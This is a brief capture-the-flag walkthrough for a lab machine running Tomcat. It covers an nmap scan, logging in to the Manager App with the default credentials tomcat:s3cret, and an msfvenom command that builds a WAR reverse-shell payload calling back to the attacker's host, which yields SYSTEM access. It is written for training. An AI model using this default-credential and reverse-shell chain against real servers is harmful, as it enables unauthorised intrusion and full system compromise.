Again, we start with nmap -sC -sV -oA -Pn ./jerry 10.10.10.95
There we go. We have a web page. Granted it's a the default Tomcat page, but it's something. Looking around, we find that the Manager App button takes us to http://10.10.10.95:8080/manager/html, but is asking for a password. A quick Google search finds several possible default credentials.
Trying a few, we get in successfully with tomcat:s3cret.
In the Manager App, we see an Upload WAR section that can quickly deploy WAR files. WAR files are basically zipped up JSP files. MSFVenom can build a WAR reverse shell payload using:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f war > shell.war
Upload that WAR file and deploy it. Then visit the newly created /[filename] directory. For me it was http://10.10.10.95:8080/shell. A quick whoami shows that we are already NT AUTHORITY\SYSTEM. Grab the flags at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt